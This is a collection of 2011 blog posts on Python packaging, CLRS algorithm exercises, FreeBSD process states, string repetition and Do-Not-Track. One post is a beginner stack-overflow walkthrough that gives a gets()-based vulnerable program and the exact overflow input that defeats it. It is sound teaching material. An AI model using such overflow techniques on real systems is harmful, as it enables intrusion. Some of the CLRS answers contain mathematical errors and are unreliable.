  • Since there was no dependency information, the first time I wanted to share a program I wrote, I had to figure out the dependencies manually.
  • I had no idea what modules were being used, and which were obsolete.
  • When I started writing test code and documentation, I did not have a good place to store them. I used a single directory for all my tiny modules because one directory per module seemed like overkill at the time.
  • When the version of python on the system was upgraded, bad things happened.

It's very tempting to simply throw all of your python code into a single directory tree, but that method only causes problems later on.

Do: Create python modules

For the example above, we can write a simple setup.py file:

from distutils.core import setup

setup(name="temp", version="1.0", py_modules = ["temp"], entry_points = { 'console_scripts': [ 'ctof = temp:main', ] }, )

If you have a full package instead of a single file module, you should use packages and not py_modules. The the official documentation should be read if you are doing anything more complicated. There are fields for your name, short and long descriptions, licensing information, etc. This example was kept purposely short to make it clear that there is not much you actually have to do to get started. Even a barebones setup.py is better than no setup.py.

Don't: use 'scripts' in setup.py (Do: Use entry points)

console_scripts entry_points should be preferred over the 'scripts' that setup.py can install. The last time I tried, scripts did not get correctly installed on Windows systems, but console_scripts did. Additionally, the more code you have in scripts, the less testable code you have in your modules. When you use scripts, eventually you will get to the point where they all contain something similar to:

from mypackage.commands import frob
frob()

and at that point, you are just re-implementing what console_scripts does for you.

Do: Version your packages and depend on specific versions.

So, after years of doing-the-wrong-thing, I finally created proper packages for each of my libraries and tools. Shortly after that I started having problems again. While I had been versioning all of my packages, any package that required another package simply depended on the package name and not any specific version or it. This created problems any time I would add new features. I would install the latest version of a utility package on a server, and it would crash since I had forgotten to upgrade the library it depended on. Since I wasn't syncing the entire directory tree anymore, libraries were becoming out of date.

Don't install packages system wide. (Do: Use virtualenv and pip)

Once you get to the point where you are using versioned packages, you'll want to be able install different versions of modules under different python versions. When I was simply sticking everything under /srv/python it was next to impossible to have multiple versions of python. I could change PYTHONPATH to point somewhere else, but there was no easy way to maintain two complete different trees of modules.

It is extremely simple to get started using pip and virtual environments. You can use the -E option to create a virtual environment and install a package in one command. The -E option to pip creates a virtual environment if one doesn't already exist:

justin@eee:~/tmp$ pip  -E python_env install bottle
Creating new virtualenv environment in python_env
  New python executable in python_env/bin/python
  Installing distribute...done........................
Downloading/unpacking bottle
  Downloading bottle-0.9.5.tar.gz (45Kb): 45Kb downloaded
  Running setup.py egg_info for package bottle

Installing collected packages: bottle
  Running setup.py install for bottle

Successfully installed bottle Cleaning up... justin@eee:~/tmp$ ./python_env/bin/python >>> import bottle >>> bottle.__file__ '/home/justin/tmp/python_env/lib/python2.7/site-packages/bottle.pyc' >>>

I can use that same method to install the toy module I wrote for this post as well:

justin@eee:~/tmp$ pip  -E python_env install ~/tmp/post/temp_mod/
Unpacking ./post/temp_mod
  Running setup.py egg_info for package from file:///home/justin/tmp/post/temp_mod

Installing collected packages: temp
  Running setup.py install for temp

    Installing ctof script to /home/justin/tmp/python_env/bin

Successfully installed temp
Cleaning up...

pip was also nice enough to install my console_script:

justin@eee:~/tmp$ ./python_env/bin/ctof 
C: 34
93

Too long; Did read

The barrier to entry for python is a lot lower compared to a language like java or c++. It's true that helloworld is simply:

print("Hello, World")

However, if you plan on using python for anything more complicated, you will want to learn how to take advantage of modules and packages. Python doesn't force you to do this, but not doing so can quickly turn into a maintenance nightmare.

July 13, 2011 09:45 PM

July 11, 2011

Nate Berry

text-mode location bar in Ubuntu 11.04


Lots of little things have gone missing in Ubuntu's new Unity interface, luckily features never really go away they just get hidden.

by Nate at July 11, 2011 11:44 PM

Eitan Adler

What language should you learn first?

Kaushal Shriyan on the beginners@perl.org mailing list asked:
"Is it better to learn Perl or Python since i can manage only writing simple bash shell scripts."[1]
Recently on ##C++-basic there was a discussion that related to learning low level vs high level languages first.

Both of these discussions are based on the premise that there is a right answer.

There are a number of things wrong with this question.
  1. Kaushal seems to be saying that he can only learn one language or the other. Why not learn both?
  2. Programming language choice depends on the project one plans on working on. Using perl to write a kernel is impossible and using COBOL to write a GUI application is silly. Asking such a question requires more context.
  3. For some reason only Perl and Python are the only languages given as choices. What about C++? Why not Haskell? There are many useful languages and they each have their own pros and cons.
More generally, there are many skills have a programmer needs to have and there are different ways of learning each of these skills.
  • Code organization and Design Patterns
  • Programming constructs
  • Abstraction and encapsulation
  • Data structures and how to choose between them
  • Syscalls and context switching
  • and many more
All of these topics can be reasonably broken down into two types: programming topics and computer science topics.

Higher-level languages allow programmers to abstract away the low level details and focus on getting a task done. This is great for completing a task and making a beginner feel proud about what (s)he has created. It also helps the programmer learn programming basics such as variables, loops, arrays, input/output, and functions without getting bogged down with memory management.

On the other hand, choosing between various data structures is confusing unless one understands why things work the way they do. Learning about context switches, data structures, syscalls, pointers, etc is easier in a low level language (like C or C++).
 
So what language should someone learn first?

A good programmer should learn both types of languages. In my experience a lot beginners have trouble wrapping their heads around functions and other organizational patterns such as classes. I usually start people with Python and move quickly to C++. This helps to teach good programming style and techniques before they get to learn the low level concepts as well. 

[1] http://comments.gmane.org/gmane.comp.python.tutor/65413

by Eitan Adler (noreply@blogger.com) at July 11, 2011 04:37 PM

July 10, 2011

Eitan Adler

Blogging my way through CLRS section 3.1 [part 5]

Part 4 here.
I wrote an entire blog post explaining the answers to 2.3 but Blogger decided to eat it. I don't want to redo those answers so here is 3.1:
For now on I will title my posts with the section number as well to help Google.



Question 3.1-1: Let $f(n)$ and $g(n)$be asymptotically non-negative functions. Using the basic definition of $\theta$-notation, prove that $\max(f(n) , g(n)) \in \theta(f(n) + g(n))$ .

CLRS defines $\theta$ as $\theta(g(n))= \{ f(n) :$ there exists some positive constants $c_1, c_2$, and $n_0,$ such that $0 \leq c_1g(n) \leq f(n) \leq c_2g(n)$ for all $n \geq n_0\}$ Essentially we must prove that there exists some $c_1$ and $c_2$ such that $c_1 \times (f(n) + g(n)) \leq \max(f(n), g(n)) \leq c_2 \times (f(n) + g(n))$ There are a variety of ways to do this but I will choose the easiest way I could think of. Based on the above equation we know that $\max(f(n), g(n)) \leq f(n) + g(n)$ (as f(n) and g(n) must both me non-negative) and we further know that $\max(f(n), g(n))$ can't be more than twice f(n)+g(n). What we have then are the following inequalities: $$\max(f(n), g(n)) \leq c_1 \times (f(n) + g(n))$$ and $$c_2 \times (f(n) + g(n)) \leq 2 \times \max(f(n), g(n))$$ Solving for $c_1$ we get 1 and for $c_2$ we get $\frac {1} {2}$


Question 3.1-2: Show for any real constants $a$ and $b$ where $b \gt 0$ that $(n+a)^b \in \theta(n^b)$
Because $a$ is a constant and the definition of $\theta$ is true after some $n_0$ adding $a$ to $n$ does not affect the definition and we simplify to $n^b \in \theta(n^b)$ which is trivially true

Question 3.1-3: Explain why the statement "The running time of $A$ is at least $O(n^2)$," is meaningless.

I'm a little uncertain of this answer but I think this is what CLRS is getting at when we say a function $f(n)$ has a running time of $O(g(n))$ what we really mean is that $f(n)$ has an asymptotic upper bound of $g(n)$. This means that $f(n) \leq g(n)$ after some $n_0$. To say a function has a running time of at least g(n) seems to be saying that $f(n) \leq g(n) \And f(n) \geq g(n)$ which is a contradiction.


Question 3.1-4: Is $2^{n+1} = O(2^n)$? Is $2^{2n} = O(2^n)$?

$2^{n+1} = 2 \times 2^n$. which means that $2^{n+1} \leq c_1 \times 2^n$ after $n_0$ so we have our answer that $2^{n+1} \in o(2^n)$ Alternatively we could say that the two functions only differ by a constant coefficient and therefore the answer is yes.

There is no constant such that $2^{2n} = c \times 2^n$ and thefore $2^{2n} \notin O(2^n)$


Question 3.1-5: Prove that for any two functions $f(n)$ and $g(n)$, we have $f(n) \in \theta(g(n)) \iff f(n) \in O(g(n)) \And f(n) \in \Omega(g(n))$

This is an "if an only if" problem so we must prove this in two parts:

Firstly, if $f(n) \in O(g(n))$ then there exists some $c_1$ and $n_0$ such that $f(n) \leq c_1 \times g(n)$ after some $n_0$. Further if $f(n) \in Omega(g(n))$ then there exists some $c_2$ and $n_0$ such that $f(n) \geq c_2 \times g(n)$ after some $n_0$.

If we combine the above two statements (which come from the definitions of $\Omega$ and O) than we know that there exists some $c_1, c_2, and n_0,$ such that $c_1g(n) \leq f(n) \leq c_2g(n)$ for all $n \geq n_0\}$

We could do the same thing backward for the other direction: If $f(n) \in \theta(g(n))$ then we could split the above inequality and show that each of the individual statements are true.


Question 3.1-6: Prove that the running time of an algorithm is $\theta(g(n)) \iff$ its worst-case running time is $O(g(n))$ and its best case running time $\Omega(g(n))$.
I'm going to try for an intuitive proof here instead of a mathematical one. If the worst case is asymptotically bound above in the worst case by a certain function and is asymptotically bound from below in the best case which means that the function is tightly bound by both those functions. f(n) never goes below some constant times g(n) and never goes above some constant times g(n). This is what we get from the above definition of $\theta(g(n)))$ A mathematical follows from question 3.1-5.

Question 3.1-7: Prove that $o(g(n)) \cap \omega(g(n)) = \varnothing$

little o and little omega are defined as follows: \[o(g(n)) = \{ f(n) : \forall c > 0 \exists n_0 \text{such that } 0 \leq f(n) \leq c \times g(n) \forall n \gt n_0\] and \[\omega(g(n)) = \{ f(n) : \forall c > 0 \exists n_0 \text{such that } 0 \leq c \times g(n) \leq f(n) \forall n \gt n_0\]

In other words

$$f(n) \in o(g(n)) \iff \lim_{n \to \infty} \frac {f(n)} {g(n)} = 0$$ and $$f(n) \in \omega(g(n)) \iff \lim_{n \to \infty} \frac {f(n)} {g(n)} = \infty$$

It is obvious that these can not be true at the same time. This would require that $0 = \infty$

by Eitan Adler (noreply@blogger.com) at July 10, 2011 06:39 PM

July 09, 2011

Nate Berry

HP EliteBook 8460p and Ubuntu


I got a new laptop for work today (an HP EliteBook 8460p). I’ve never used an HP laptop before (we usually get Thinkpads for work) but we had a subsidy to use up and it was easier to get everything from the same vendor. The idea was to get a laptop I could use in [...]

by Nate at July 09, 2011 02:21 AM

June 30, 2011

Eitan Adler

Blogging my way through CLRS [part 4]

Part 3 here This set is a bit easier than last time.
Question 2.2-1:Express the function $$\frac{n^3}{1000} - 100n^2 - 100n + 3$$ in terms of $\Theta$ notation
A function g(x) is said to be in the set of all functions $\Theta(x)$ if and only if g(x) is also in the set of all functions $\Omega(x)$ and in the set of all functions $O(x)$.
Symbolically: $$g(x) \in \Theta(x) \iff g(x) \in O(x) \And g(x) \in \Omega(x)$$

A function g(x) is in the set of all functions $\Theta(x)$ if and only if after some constant $c$ it is always true that for some constant C, $g(x) \lt Cf(x)$

A function g(x) is in the set of all functions O(x) if and only if after some constant $c$ it is always true that for some constant C, $g(x) \gt Cf(x)$

With our function we could choose practically any function to satisfy either one of these conditions. However we need to satisfy both of them. One thing that makes this easier is that it only has to be true after some constant number. This allows us to throw away the "trivial" parts that are eventually overwhelmed by the faster growing terms. We therefore are only left with $n^3$, which is the answer.

Question 2.2-2: Consider sorting n numbers stored in an array A by first finding the smallest element and exchanging it with the element in A[1], then find the second smallest element and exchange it with A[2], and continue this for the first n-1 elements of A. Write the pseudocode for this algorithm, which is known as Selection Sort. What loop invariant does this algorithm maintain? Why does it need to run only for the first n-1 elements and not for all n? Give the best case and worst case running times in $\Theta$ notation
This question is asking us to analyze selection sort in a variety of ways. I will start with writing out the pseudocode: for $j \leftarrow 1$ to $n-1$
   min $\leftarrow$ j
   for $i \leftarrow j+1$ to $n$
     $\rhd$ if A[i] < A[min] then min $\leftarrow$ i
   $\rhd$ if min $\neq$ j then swap A[min] and A[j]
A loop invariant that this algorithm maintains is that every elements prior to A[j] is sorted among the subarray A[1] to A[j] and is less than or equal to every element in the subarray A[j+1] to A[n]. I do not believe a stronger loop invariant is provable. The algorithm only needs to run until n-1 because of the second part of the loop invariant. When $j = n-1$ we know that every element after A[j], which is A[n] is not less than all previous elements. Therefore no check has to be done. In the best case (an already sorted array) and in the worst case (a reverse sorted array) the running time is the same: $\Theta(n^2)$
Question 2.2-3: Consider linear search again. How many elements of the input sequence need to be checked on average, assuming that the element being searched for is equally likely to be any element in the array? How about in the worst case? What are the average-case and worst-case running times of linear search in $\Theta$ notation?
The best case for a linear search algorithm is when the searched-for element is in the first location. In the worst case all n locations must be searched. In the average case $\frac{n}{2}$ locations have to be searched.
Question 2.2-4: How can we modify almost any algorithm to have a good best-case running time?
I have no idea what this question is asking for. I guess checking for the optimal case (as in a pre-sorted array for a sorting algorithm) and then skipping the rest of the procedure might work.

by Eitan Adler (noreply@blogger.com) at June 30, 2011 03:46 PM

Cormen on Algorithms: Blogging my way through [1/?]

Two of my good friends recently started reading Introduction to Algorithms by Thomas H. Cormen, et. al. Being unable to resist peer pressure I decided to follow and read along.

I plan on blogging my way through the chapters writing my answers to the questions as I go through the book. Like most of my plans they don't always work out, but one could try.

Here it goes!





1.1-1: Give a real-world example in which each of the following computational problems appears: (a)Sorting, (b) Determining the best order for multiplying matrices, (c) finding the convex hull of a set of points.
Sorting - Sorting comes up in virtually every algorithm one could think of. Everything from optimizing monetary investments to efficient compression algorithms has to sort data at some point or another. A harder question might be: Name one non-trivial algorithm that doesn't require sorting.
Multiplying Matrices - graphics and scientific problems frequently require matrix operations.
Convex Hull - Collision detection for use in games, modeling biological systems, or other related work could make use of this
1.1-2: Other than speed what other measures of efficiency might one use in a real-world setting?
It is possible to optimize for (and against) every limited resource. For example minimizing the amount of memory usage is important for embedded applications (and desktop ones too). Reducing total disk I/O is important to increase the longevity of hard drives. On a less technical note optimizing for monetary cost or man hours expended is important too.
1.1-3: Select a data structure you have seen previously and discuss its strengths and limitations
One of the most interesting data structures I know is the Bloom Filter. It is a probabilistic data structure that can determine if an element is NOT in a set but can't determine definitively if an element is in a set. It works by hashing each element in a set to a fixed size bit array. It then ORs the hash with itself (which starts at all zeros). One can test to see if an element is in a set by generating the hash and testing to see if every bit set to 1 in the queried element is set to 1 in the filter. If it is then you have some degree of confidence that the element is in the set. Any negative means that what you are querying for has not been added.
While most probabilistic structures have certain properties in common, bloom filters have a number of interesting pros and cons.
  1. A negative result is definitive - if a query returns that an element has not been added then one knows this to be 100% true.
  2. Since hashes are fixed size the amount of memory a Bloom Filter uses is known and bounded.
  3. Bloom filters can quickly become useless with large amounts of data. It is possible that every bit will be set to 1 which effectively makes the query a NOP.
  4. It is impossible to remove data from a bloom filter. One can't just set all the bits of the hash to a zero because that might be removing other elements as well.
  5. Without a second set of data there is no way to deterministically list all elements (unlike other probabilistic data structures such as Skip Lists).
1.1-4: How are the shortest path and traveling salesmen problems similar? How are they different?
This one I'm very uncertain about. Based on my understanding so far: the shortest path problem only has two nodes and the goal is to choose a path to get from A to B. In the traveling salesman problem there are many points, and the start and end points are the same. TSP in effect uses multiple iterations of the shortest-path problem on different nodes to get the shortest "tour".
1.1-5: Come up with a real-world problem in which only the best solution will do. Then come up with a problem in which a solution that is "approximately" the best will do?
There are very few problems where one needs the objectively optimal solution. Mathematical questions are the only problems I could think of that need that level of accuracy. Virtually every problem needs a good enough solution. Some examples include finding a fast route for packets on the internet or locating a piece of data in a database.
update 2011-06-30: modified text of answers 1.1-3 and 1.1-5 to be more clear.

by Eitan Adler (noreply@blogger.com) at June 30, 2011 03:36 PM

Blogging my way through CLRS [3/?]

part 2 here
According to wikipedia Introduction to Algorithms is also known as CLRS which is shorter (and more fair to the other authors) so I'll use that name for now on.

Question 2.1-1 asks me to redraw a previous diagram, but with different numbers. I am not going to post that here.
Question 2.1-2 Rewrite the insertion sort procedure to sort into nonincreasing instead of nondecreasing order:
Here is the pseudocode of the nonincreasing version of insertion sort: for j $ \leftarrow 2$ to length[A]
  do key$ \leftarrow A[j]$
     $\rhd$ Insert A[j] into sorted sequence A[1..j-1]
    $ i \leftarrow j - 1$
    while $i \gt 0$ AND $A[i] \lt key$
      do $A[i+1] \leftarrow A[i]$
         $i \leftarrow i - 1$
    $A[i+1] \leftarrow key$

Now we prove that this loop correctly terminates with a nonincreasing array to about the same level of formality as the book proved the original.
Initialization: At the first iteration, when $j=2$ the subarray A[1..j-1] is trivially sorted (as it has only one element).
Maintenance: In order to prove maintenance we need to show that the inner loop correctly terminates with an array with "space" for the correct element. As CLRS did not prove this property, I will also skip this proof.
Termination: this loop terminates when j > length[A] or when $j = length[A]+1$. Since we have "proven" (to some level) the maintenance of the loop invariant (that at each point during the loop the subarray [1..j-1] is sorted) we could substitute length[A]+1 for $j$ which becomes [1..length[A]] or the entire array.
This shows that the loop terminates with a correctly sorted array.
Question 2.1-3:
Input:A sequence of $n$ numbers $A = {a_1,a_2,...,a_n}$ and a value $v$.
Output: An index i such that $v = A[i]$ or a special value $\varnothing$ (NIL) if $v \notin A$
Write the pseudocode for Linear Search, which scans through the sequence looking for $v$. Using a loop invariant, prove that your algorithm is correct.
The first part, writing the pseudocode, seems fairly easy:
$r \leftarrow \varnothing$
$j \leftarrow 1$ to length[A]
   if $v = A[j] \rhd$ optionally check that $r = \varnothing$
     $r \leftarrow j$
return $r$

The second part, proving that this is correct is harder than before because we don't have a trivially true initialization of our loop invariant.
Initialization: $j = 1\ \And\ r = \varnothing$ at the start of our loop. At this point there are no elements prior to A[j] and we have yet to find $v$ in A. As such our invariant (that r will contain the correct value) is true.
Maintenance: At every point in the loop the subarray A[1..j] has either contained $v$ in which case it has been assigned to $r$ or has not contained $v$ in which case $r$ remains $\varnothing$. This means that loop invariant holds for every subarray A[1..j].
Termination: At the end of the loop $j = $ length[A]. We know from our maintenance that $r$ is correct for every subarray A[1..j] so at termination $r$ contains the correct value
Question 2.1-4 Consider the problem of adding two $l$-bit binary integers, stored in two $l$-element arrays $A$ and $B$. the sum of the two integers should be stored in binary form in $(l+1)$-element array $C$. State the problem formally and write pseudocode for adding the integers.
Stating the problem formally looks something like:
Input: Two $l$-bit integers $A$ and $B$ stored as arrays of length $l$ with the most significant bit stored last
Output: An $l+1$-bit integer ($C$) stored as arrays of length $l+1$ with the most significant bit stored last
Here is the pseudocode: $\rhd$ X is a $l$-bit array of bits initialized to all zeros in order to store the carry
for j $\leftarrow$ 1 to $l$
   $C[j] \leftarrow copyC \leftarrow A[j] \oplus B[j]$
   $X[j+1] \leftarrow A[j] \And B[j]$
   $C[j] \leftarrow C[j] \oplus X[j] $
   $X[j+1] \leftarrow copyC \oplus X[j+1] $

by Eitan Adler (noreply@blogger.com) at June 30, 2011 03:29 PM

Blogging my way through Cormen [2/?]

As I said in part 1 I am reading a book on algorithms and have decided to blog my way through. My primary goal in doing so is to improve my writing skills. A secondary goal is to force myself to actually answer the questions.

1.2-2 Suppose we are comparing implementations of insertion sort and merge sort on the same machine. For inputs of size n, insertion sort runs in $8n^2$ steps, while merge sort runs in $64n \ln n$ steps. For which values of $n$ does insertion sort beat merge sort?
The question is essentially asking for which values of $n$ is $8n^{2} \lt 64n \ln n$. We can solve this question by first factoring out an $8n$ and we get $n \lt 8 \ln n$ Unfortunately this problem is not solvable using elementary operations. Luckily we are being asked for an integer solution (as computers operate in discrete steps) and we could use the underutilized guess-and-and method.
$n$ $8 \ln n$
14 21
41 29.7
20 23.9
25 25.6
26 26.01
27 26.3
So there we have it: given this data we would prefer insertion sort whenever we have fewer than 27 items.
1.2-3 What is the smallest value of n such that an algorithm whose running time is $100n^2$ runs faster than an algorithm whose running time is $2^n$ on the same machine.
This question is asking us find the smallest positive integer $n$ that satisfies $100n^{2} \lt 2^n$. This could be solved by doing the math, by looking at a plot of the curves, or using the above method again. . $$2^{14} = 16384$$ $$(100 \times 14^{2}) = 19600$$ $$2^{15} = 32768$$ $$(100 \times 15^{2}) = 22500$$
An exponential algorithm becomes far worse than a polynomial algorithm when we have only 15 items to worry about. In other words: avoid exponential algorithms!
Thank you JT and JM for giving me the idea to go through the book, and for looking at my posts before I publish them.

by Eitan Adler (noreply@blogger.com) at June 30, 2011 03:28 PM

June 25, 2011

Eitan Adler

Google translate proxy no longer available

One old trick to bypass simple domain based filters was to use Google translate on the domain and go from English to English (or the native language to the native language - whatever it might be).

I recently came across a link that happen to be using Google translate in that way a (I'm not sure why) and I got an error from Google

"Translation from English into English is not supported."

When I tried with other languages I got similar errors. Translating to other languages works as usual.

Luckily this trick is not really needed as there are thousands of available proxies or one could just make their own.

by Eitan Adler (noreply@blogger.com) at June 25, 2011 04:15 PM

Gera's Insecure Programming: Warming up to the stack #1

Gera has a series of "challenges" designed to help teach people the basics of exploitation. The goal is to provide some input to the program to get it to output you win!"

The code for the first one
/*
* stack1.c
* specially crafted to feed your brain by gera
*/
int main() {
   int cookie;
   char buf[80];
   printf("buf: %08x cookie: %08x\n", &buf, &cookie);
   gets(buf);
   if (cookie == 0x41424344)
      printf("you win!\n");
   }
}

At a lower level
The assembly for the above program generated by clang on FreeBSD with -O3 -fomit-frame-pointer (comments are my addition)
...
main:
   pushl %esi
   subl $100, %esp
   leal -8(%ebp), %eax
   movl %eax, 8(%esp)
   leal -88(%ebp), %esi
   movl %esi, 4(%esp)
   movl $.L.str, (%esp)
   call printf
   movl %esi, (%esp)
   call gets      ; note that gets does not have a length argument
   cmpl $1094861636, -8(%ebp)
   jne .LBB0_2    ; we will come back to this
   movl $str, (%esp)
   call puts
.LBB0_2:
   xorl %eax, %eax
   addl $100, %esp
   popl %esi
   ret
...

Break it down
The program starts off by creating two variables: a cookie and a fixed size buffer. It then prints out the address of buf and cookie
Then the fun starts: gets(3) is called to put data in buf. gets is a very insecure function. To quote the man page:
The gets() function cannot be used securely. Because of its lack of bounds checking, and the inability for the calling program to reliably determine the length of the next incoming line, the use of this function enables malicious users to arbitrarily change a running program's functionality through a buffer overflow attack.
Then we have a check to see if cookie is equal to some value. We can convert this value from an integer to printable ascii(7) characters. 0x41is A, 0x42 is B, etc. So we want to set the cookie to "ABCD". There is one little gotcha: The machine I'm using (and most you probably are) is little endian so we actually need to reverse the order of our text.
What should we actually do?
There is no guarantee of how C variables are stored but we can make a good guess. On my system sizeof(int) is 4 and sizeof(char) is always 1 so our stack probably looks like:
cookie most significant byte
cookie byte 2
cookie byte 3 
cookie least significant byte
buf[79]
buf[78]
...
buf[0]
Lets try it!

The string we want to insert is
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxDCBA. 80 random characters to fill the buffer and then DCBA to fill the cookie (the important part)

[eitan@ByteByte ~/gstack ]%echo $(jot -b x -s '' 80)DCBA > exploit 
[eitan@ByteByte ~/gstack ]%./a.out <exploit 
buf: bfbfea48 cookie: bfbfea98
you win!
A different way:
Lets say we didn't have the source and that this was some music player we wanted to (legally) jailbreak. If you disassemble the file you could can change the jump address or just remove the jump altogether to avoid the check
[eitan@ByteByte ~/gstack !130!]%./a.out
buf: bfbfea48 cookie: bfbfea98
you win!
Some notes

No serious programmer uses gets anymore and real exploits are likely to be harder to create due to OpenBSD's w^x protection, gcc's stack protector, and good coding habits. This was just an intro to the art of exploitation. I plan on following with either the next warming up to the stack challenge or the "esoteric" format string vulnerabilities.

Update 12/26/10 clarified the goal of the exploit. Explained what "jot" does.

by Eitan Adler (noreply@blogger.com) at June 25, 2011 04:15 PM

Repeating characters in multiple languages

A friend of mine asked me how to repeat a string a specified number of times. There are a few times when ones wants to do this when programing. Here is the "repeating operator" in various languages. I tried to use an operator when possible - but in certain cases I used a function. In all cases I repeat a string followed by a newline.
The BSDs
for i in $(jot 1 5);
do echo -n "Hi";
done;
echo "";

Output:
HiHiHiHiHi
Most Linux distributions
for i in $(seq 1 1 5);
do echo -n "Hi";
done;
echo "";

Output:
HiHiHiHiHi
Perl
print "-" x 10;
print "\n"

Output:
----------
Python
"ab" * 10 Output: 'abababababababababab'
R
paste(rep("Hi",5), collapse='')
Output:
[1] HiHiHiHiHi
Ruby
print "-" * 10;
print "\n"

Output:
----------
Tcl
string repeat "Hi" 5
Output:
HiHiHiHiHi
ZSH
repeat 5 printf 'abc';
echo "";

Output:
abcabcabcabcabc
update 5/30/11: Thanks to Hans I found out that jot is not POSIX. Also fixed formatting.

by Eitan Adler (noreply@blogger.com) at June 25, 2011 04:15 PM

Proccess Kernel States (wchan in ps)

FreeBSD has a nice feature that will signal a process with SIG-INFO when you press Ctrl-T and will tell you some other interesting data about the process such as the load of the CPU, current command that is being run, and the kernel state the process is in (the wchan keyword in ps(1)).
This state is set by the msleep function and is a syscall or lock that the proccess is waiting on

I know of no other list explaining each of these states so here it goes:

biord: block on io read.
futex: [Linux emulation] process is waiting until a futex is released (see fast userspace mutex)
getblk: get block (seems to be generated often by tar)
nanoslp: process is sleeping for some number of nanoseconds (see nanosleep(2))
pause: process is waiting for a signal (see pause(3))
pcmwrv: waiting for audio samples to be played
piperd: read(2) from a pipe
pipewr: write(2) to a pipe
physrd: reading from a HDD
runnable: process is ready to run on the CPU
running: currently on CPU
sbwait: wait for socket to return data (see uipc_sockbuf.c) 
swread: read in from swap
stopev: process is stopped because of a debugging event (see sys_process.c; relates to ptrace(2))
tttout: write(2) to a tty
ttyin: read(2) from a tty
ucond: a proccess is blocked until a pthreads mutex is released
vnread: part of the pager (see vnode_pager.c)
wait: wait(2) for a child process
wdrain: write drain. On a device mounted with the async option (or soft-updates) wait until all the previous writes have been completed. (see vfs_bio.c)
zombie: a process died but its parent did not wait(2) for it.

There are other syscalls that are similar to the ones mentioned above (such as readv(2) instead of read(2), and waitpid(2) instead of wait(2)) which will end up with the same wchans.

Thank you irc://irc.efnet.org/nox--- for helping me figure out what all of these mean.

I will try to keep this list up-to-date as I find out about more of them.

Update 9/21/10: removed "CPU0" state - it doesn't show up in the siginfo output - only in the top output.
Update 9/22/10: added getblk entry without link to syscall
Update 10/7/10: added wdrain, swread - I have a /lot/ more to add. 
I need to add all the following - and more: sfbufa, umtxqb, psleep, qsleep, bo_wwait, bwunpin, sigwait, pause, suspkp suspkp ktsusp  mntref, "mount drain", roothold, rootwait, failpt, exithold, exit1, ritwait , kqflxwt, kqclose, kqclo1, kqclo2, kqkclr, kqflxwt, ithread, iev_rmh , purgelocks, conifhk, aioprn, aiordy, aiospn, aiowc vlruwt vlruwk targrd tgabrt cgticb cgticb  sgread simfree ccb_scanq crydev  crypto_destroy crypto_destroy crypto_ret_wait

by Eitan Adler (noreply@blogger.com) at June 25, 2011 04:14 PM

Google's "suspicious account login" feature

Story here One question: Can the account that generated the warning also dismiss it?

by Eitan Adler (noreply@blogger.com) at June 25, 2011 04:14 PM

The Usefulness of the X-Do-Not-Track Header

Do-Not-Track [0] is a recent proposal by the FTC [1] to deal with the problem of users being “tracked” by advertisers. This consists of adding a new HTTP header[2] into page requests that indicates that the user is “opting out” of being “tracked”


The proposal is backed by a number of major players, including Mozilla [3] , the Electronic Frontier Foundation [4] , Wladimir Palant (the maintainer of of AdBlockPlus)[5] , and Giorgio Maone (the author of NoScript) [6].


Is this a good idea? Does it solve any existing problems?


One important factor to consider is that everyone has a different understanding of the concept of “tracking”. If a user has the header set but logs in to a service is there a difference? What if the user closes the browser in between sessions? Can the service remember who logged on last? Can a bank track a user’s visits for security purposes? What about a quiz website tracking participation to prevent cheating? And these are the simple questions. The definition of the word ‘tracking’ is not officially established.


Google claims it anonymizes IP addresses [7] but the “anonymization only involved clearing the last octet of the user’s IP address.[8] Is that considered tracking? Who decides? You? Google? The government?


Even if we came to a shared definition of what it means to “track”, how can one prove if tracking is done or not?


Let’s imagine that the US government enacts a law requiring websites to follow this header based on this elusive definition of “tracking”. What about servers outside the US? How would their activity be handled? What about a foreign user accessing a US based website? The reverse? What if different jurisdictions came to had two mutually exclusive definitions of “tracking”?


Furthermore, what if websites began to deny service to users that used the X-Do-Not-Track header? Browsers would be forced to remove the header in order to browse the web - effectively nullifying the header’s original purpose.


Arvind Narayanan [9] says that “Examining ad blocking allows us to predict how publishers, ... assuming DNT is implemented as a browser plug-in, ad blocking and DNT would be equivalent ... ad blocking would result in a far greater decline in revenue than merely preventing behavioral ads. We should therefore expect that DNT will be at least as well tolerated by websites as ad blocking.” This analysis assumes that the header will be in a plugin or optional setting. If every browser implements this header by default, as they should to attract more users, a much larger percentage of people will be opting out than with ad-blockers today.


What if the law disallowed differing service for those with or without the header? What would be the point? It would make sense to simply disallow “tracking” for all websites, which would make the header moot. Of course, this idea is subject to the same questions as asked above.


Instead of focusing on silly request-based ideas for websites, browser vendors should be working on fixing the privacy holes that have been already been found. Some examples include Firefox’s fix for the CSS history leak, Internet Explorer’s anti-tracking features [10][11] and related instances


What if browser vendors could consider idea of shipping their browsers with mini versions of ad-preventing software like AdblockPlus, NoScript[12] , and RequestPolicy[11] that blocked major third party advertisers such as doubleclick. Of course this could become a cat and mouse game - and it may not be a good idea at all - but it would be more effective than the do-not-track header. Other options include appeasing advertises with targeted user advertising and behavior analysis that doesn’t violate user privacy. For examples see the footnote [13]


Quite simply what we need for increased client side awareness of the privacy implications of various features and some form of control given to the users about what data the transmit across the Internet about themselves.



[0] http://donottrack.us/
[1] http://www.ftc.gov/os/2010/12/101201privacyreport.pdf
[2] Originally the header was “X-Behavioral-Ad-Opt-Out: 1 X-Do-Not-Track: 1” but the current version is now “X-DNT: 1” to save bandwidth
[3] https://wiki.mozilla.org/Privacy/Jan2011_DoNotTrack_FAQ
[4] https://www.eff.org/deeplinks/2011/01/mozilla-leads-the-way-on-do-not-track
[5] https://adblockplus.org/forum/viewtopic.php?t=6492
[6] http://hackademix.net/2010/12/28/x-do-not-track-support-in-noscript/
[7] http://searchengineland.com/anonymizing-googles-server-log-data-hows-it-going-15036
[8] http://news.cnet.com/8301-13739_3-10038963-46.html
[9] http://33bits.org/2010/09/20/do-not-track-explained/
[10] http://blogs.msdn.com/b/ie/archive/2010/12/07/ie9-and-privacy-introducing-tracking-protection-v8.aspx
[11] http://blogs.msdn.com/b/ie/archive/2011/01/25/update-effectively-protecting-consumers-from-online-tracking.aspx
[12] These particular addons “break” websites by default, but they can be configured in such a way to limit the damage they cause.
[13] See http://crypto.stanford.edu/adnostic/ Profiling and targeting take place in the browser. The ad network is unaware of the user’s interests


Thank you to JT very much for the sane editing and thoughts provided.

by Eitan Adler (noreply@blogger.com) at June 25, 2011 04:14 PM

Warming up to the stack #3

#include <stdio.h>
